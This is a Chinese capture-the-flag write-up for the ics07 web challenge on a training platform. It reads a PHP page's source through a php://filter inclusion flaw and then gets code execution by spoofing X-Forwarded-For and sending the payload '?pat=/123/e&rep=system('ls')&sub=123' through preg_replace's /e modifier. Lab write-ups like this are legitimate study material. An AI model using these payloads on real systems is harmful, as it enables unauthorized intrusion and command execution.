攻防世界-WEB-ics07

目录

前言

正文

结尾

作者的其他文章


前言

1024到了,在这里先祝各位师傅节日快乐


正文

发现绝大多数点了都会重定向到首页,只有设备维护中心可以进去

抓了个包并没有看见可以利用的东西,只能暂时放弃,这个时候看看扫描的结果

下载了start.sh,发现了一些东西

能获取到的信息是, var/www/html 目录下的所有文件和子目录的所有者和所属组都修改为 root且该目录拥有最高权限,但是并没有什么卵用

再看看cms的信息

也没啥东西,那就继续看login目录

发现是一个跟设备维护中心类似的目录

点击上面的链接

发现存在一个page 参数,尝试用php伪协议

发现能成,解码后得到index.php的源码

php 复制代码
<?php
error_reporting(0);

@session_start();
posix_setuid(1000);


?>
<!DOCTYPE HTML>
<html>

<head>
    <meta charset="utf-8">
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <link rel="stylesheet" href="layui/css/layui.css" media="all">
    <title>设å¤ç>>´æ¤ä¸­å¿</title>
    <meta charset="utf-8">
</head>

<body>
    <ul class="layui-nav">
        <li class="layui-nav-item layui-this"><a href="?page=index">äºå¹³å°è®¾å¤ç>>´æ¤ä¸­å¿</a></li>
    </ul>
    <fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
        <legend>设å¤å表</legend>
    </fieldset>
    <table class="layui-hide" id="test"></table>
    <script type="text/html" id="switchTpl">
        <!-- è¿éç checked çç¶æåªæ¯æ¼ç¤º -->
        <input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="å¼|å³" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}>
    </script>
    <script src="layui/layui.js" charset="utf-8"></script>
    <script>
    layui.use('table', function() {
        var table = layui.table,
            form = layui.form;

        table.render({
            elem: '#test',
            url: '/somrthing.json',
            cellMinWidth: 80,
            cols: [
                [
                    { type: 'numbers' },
                     { type: 'checkbox' },
                     { field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
                     { field: 'name', title: '设å¤å', templet: '#nameTpl' },
                     { field: 'area', title: 'åºå' },
                     { field: 'status', title: 'ç>>´æ¤ç¶æ', minWidth: 120, sort: true },
                     { field: 'check', title: '设å¤å¼å³', width: 85, templet: '#switchTpl', unresize: true }
                ]
            ],
            page: true
        });
    });
    </script>
    <script>
    layui.use('element', function() {
        var element = layui.element; //导èªçhoverææãäºçº§èåç­åè½ï¼éè¦ä¾èµelement模å
        //çå¬å¯¼èªç¹å>>
        element.on('nav(demo)', function(elem) {
            //console.log(elem)
            layer.msg(elem.text());
        });
    });
    </script>

<?php

$page = $_GET[page];

if (isset($page)) {



if (ctype_alnum($page)) {
?>

    <br /><br /><br /><br />
    <div style="text-align:center">
        <p class="lead"><?php echo $page; die();?></p>
    <br /><br /><br /><br />

<?php

}else{

?>
        <br /><br /><br /><br />
        <div style="text-align:center">
            <p class="lead">
                <?php

                if (strpos($page, 'input') > 0) {
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
                    die();
                }

                if (strpos($page, 'text') > 0) {
                    die();
                }

                if ($page === 'index.php') {
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
        </p>
        <br /><br /><br /><br />

<?php
}}


//æ¹ä¾¿çå®ç°è¾å¥è¾åºçåè½,æ­£å¨å¼å中çåè½ï¼åªè½åé¨äººåæµè¯

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}





?>

</body>

</html>

在末尾发现了有意思的东西

php 复制代码
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

isset() 函数用于判断输入的值不为NULL且已设置变量,preg_relace() 用于在字符串中搜索并替换匹配的内容

**preg_replace()**使用的例子:

php 复制代码
$str = "123abc456def";
$new_str = preg_replace("/\d+/", "a", $str);
echo $new_str; // 输出:aaaabcaaadef

ok,至于这里的preg_replace

php 复制代码
preg_replace($pattern, $replacement, $subject);

因为pattern有自己定义,所以我联想到了一个尘封已久的正则**/e**

/e 修饰符曾经被用来允许在替换模式中执行PHP代码。这意味着在 preg_replace() 函数的替换字符串中可以包含PHP代码片段,这些代码会在每次匹配到时被执行,并且其返回值将作为实际的替换文本. 由于其极高的安全隐患,从PHP 5.5.0开始,/e 修饰符已经被弃用,在PHP 7.0.0中完全移除

所以这里构建了一个exp:?pat=/123/e&rep=system('ls')&sub=123

成功


结尾

就在此祝愿各位师傅1024节日快乐,技术大涨,单身的师傅们早日收获幸福

就是这样


作者的其他文章

攻防世界-WEB-WEIPHP(记一次有趣的代码审计)_攻防世界weiphp-CSDN博客

BugKu-WEB-sodirty_bugku sodirty-CSDN博客

NSSCTF-WEB-pklovecloud-CSDN博客

NSSCTF-WEB-easy_eval-CSDN博客

相关推荐
ServBay2 小时前
垃圾堆里编码?真的不要怪 PHP 不行
后端·php
用户962377954484 小时前
CTF 伪协议
php
用户962377954481 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954481 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star1 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954481 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
BingoGo2 天前
当你的 PHP 应用的 API 没有限流时会发生什么?
后端·php
JaguarJack2 天前
当你的 PHP 应用的 API 没有限流时会发生什么?
后端·php·服务端